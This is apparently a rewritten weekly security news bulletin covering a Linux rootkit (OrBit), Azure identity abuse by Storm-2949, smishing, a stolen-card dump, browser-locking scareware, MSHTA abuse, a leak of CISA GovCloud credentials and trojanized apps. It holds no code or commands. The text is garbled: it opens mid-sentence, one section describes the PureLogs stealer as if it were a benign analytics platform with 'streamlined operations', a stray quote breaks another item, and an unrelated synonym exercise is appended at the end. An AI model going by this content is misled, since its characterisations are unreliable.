Security Alert: Linux Rootkits, Router Vulnerabilities, AI Breaches, Scam Kits, and More in This Week’s ThreatsDay Bulletin

into plain text. The attackers rotated XOR keys, shuffled install paths, swapped backdoor credentials, added auditd-evasion hooks, and eventually incorporated a service-side PAM impersonation primitive using OrBit, a fork of the open-source rootkit Medusa. It is believed that the earliest OrBit sample was built from a pre-publication snapshot of the December 2022 Medusa source tree. The AI-driven intrusions in campaigns SHADOW-AETHER-040 and SHADOW-AETHER-064 used agentic AI with similar tactics to conduct malicious attacks against government and financial organizations in Latin America. Mythos intel sharing has expanded, allowing users to share cybersecurity threats using Anthropic’s AI model. Discord has implemented end-to-end encryption for voice and video calls using the DAVE protocol. Microsoft disclosed a sophisticated attack by Storm-2949 that abused Azure identities to exfiltrate sensitive data from an organization’s high-value assets. Microsoft reported that the attacker behind Storm-2949 used legitimate cloud and Azure management features to gain access and execute remote code on VMs, as well as access sensitive cloud resources such as Key Vaults and storage accounts. This allowed them to move laterally across cloud and endpoint environments while blending in with expected administrative behavior. Additionally, the attacker conducted discovery activities, installed ScreenConnect, and attempted to disable Microsoft Defender Antivirus protections.

Apple announced that its App Store prevented over $2.2 billion in potentially fraudulent transactions and rejected over 2 million problematic app submissions in 2025. They also successfully blocked 1.1 billion fraudulent customer account creations, deactivated 40.4 million customer accounts for fraud and abuse, terminated 193,000 developer accounts over fraud concerns, and rejected over 138,000 developer enrollments.

Two U.S. nationals pleaded guilty to running a business that provided services to customers engaged in telemarketing and tech-support fraud schemes. The investigation also led to the conviction of five India-based telemarketing fraudsters for targeting and defrauding Americans.

HP released fixes for a critical heap-based buffer overflow vulnerability in HPLIP that could allow escalation of privileges and arbitrary code execution on Linux endpoints and enterprise print servers.

AhnLab warned of a Telegram-oriented smishing campaign designed to hijack victims’ accounts and steal account information using SMS messages. Threat actors trick users into entering their phone numbers and login codes on phishing sites to compromise accounts.

Zimperium zLabs observed a new Android malware campaign called Premium Deception conducting carrier billing fraud through premium SMS abuse across multiple countries. The malware subscribes users to premium services without their knowledge or consent and sends metadata and subscription confirmations to operators via a Telegram-based exfiltration channel.

A new Brazilian banking trojan called Banana RAT has emerged as the latest malware targeting financial institutions in Brazil. ” The campaign has been targeting various industries, including financial services, healthcare, and manufacturing.

The Evolution of PureLogs with Async/Await Patterns

In a bid to enhance task efficiency and elevate analysis complexity, the latest iteration of PureLogs extensively integrates async/await patterns. This strategic move aims to streamline operations and offer a more intricate data analysis process for users. The implementation of async/await patterns signifies a significant step forward in optimizing task completion and data interpretation within the PureLogs platform.

Swiss Post Cybersecurity Unveils Similar Campaign in January 2026

In a parallel development, Swiss Post Cybersecurity unveiled a campaign akin to the innovations seen in PureLogs, back in January 2026. The campaign showcased a similar dedication to task optimization and data analysis intricacy, aligning with the industry’s growing focus on efficiency and advanced methodologies.

Dark Web Revelation: Card Dump Unleashed by B1ack’s Stash

A recent revelation from the dark web’s notorious B1ack’s Stash carding marketplace has sent shockwaves across the cybersecurity landscape. The marketplace announced the release of a staggering 4.6 million stolen credit card records, exposing sensitive information including full card numbers, expiration dates, CVV2 codes, cardholder names, billing addresses, email addresses, phone numbers, and IP addresses. Of these records, 4.3 million are deemed fresh and viable for illicit activities, posing a significant threat to individuals primarily from the U.S., Canada, the U.K., France, and Malaysia.

Browser-Locking Scareware Emerges with CypherLoc

A new wave of web-based scareware, named CypherLoc, has surfaced with alarming capabilities to manipulate browsers and drive unsuspecting victims towards fraudulent tech support services. The kit, identified by Barracuda Networks, has already initiated over 2.8 million attacks since the beginning of 2026. The sophisticated attack mechanism typically begins with phishing emails leading victims to malicious web pages, culminating in a browser-locking scareware interface that coerces victims into seeking immediate support.

AI-Powered Phishing Campaigns at Scale

Recent research has shed light on the potential misuse of publicly available social media data and generative AI (GenAI) to orchestrate large-scale, personalized spear-phishing campaigns. The study conducted by researchers from the University of Texas at Arlington and Louisiana State University showcases the alarming ease with which AI models can extract targeted information to craft convincing phishing campaigns without the need for extensive reconnaissance or stolen databases.

Legacy LOLBIN Exploitation Persists with MSHTA

Despite its legacy status, attackers continue to exploit the Microsoft HTML Application Host (MSHTA) utility for malicious campaigns, as revealed by Bitdefender. The utility, categorized as a Living-off-the-Land binary (LOLBIN), remains a preferred tool for executing multi-stage, fileless malware campaigns involving PowerShell and HTA scripts. This persistent abuse of MSHTA underscores the ongoing challenges in combating sophisticated malware threats.

U.S. Cybersecurity Agency Faces GovCloud Credential Exposure

A concerning incident unfolded as a contractor for the U.S. Cybersecurity and Infrastructure Security Agency (CISA) inadvertently exposed highly privileged AWS GovCloud credentials and internal systems on a public GitHub repository. The repository, discovered by GitGuardian, contained a trove of sensitive information, including plain-text passwords, AWS tokens, and Entra ID SAML certificates. While the repository has been taken offline, the incident highlights the critical need for robust security measures to safeguard sensitive data.

Trojanized Apps Cluster Discovered by Palo Alto Networks

Palo Alto Networks Unit 42 has identified a cluster of trojanized apps, collectively known as TamperedChef (EvilAI), comprising 4,000 samples across 100 unique variants. These malicious apps leverage deceptive tactics, including malicious ads, to distribute payloads discreetly. The TamperedChef-style malware exhibits advanced persistence mechanisms, remaining dormant before activating and enabling adversaries to execute various payloads, posing a significant threat to unsuspecting users.

Staying Vigilant in a Dynamic Cybersecurity Landscape

Amidst the rapidly evolving cybersecurity landscape, vigilance and proactive measures are paramount. From dark web revelations to sophisticated phishing campaigns and legacy utility exploitation, the threats are diverse and ever-present. It is crucial to prioritize patching vulnerabilities, scrutinize sources of trust, and remain attentive to even the most seemingly mundane alerts. By staying informed and proactive, individuals and organizations can mitigate risks and navigate the complex cybersecurity terrain with resilience.

Transform the following sentence using synonyms:

Original sentence: “The weather was extremely hot and humid.”

Transformed sentence: “The climate was exceedingly warm and muggy.”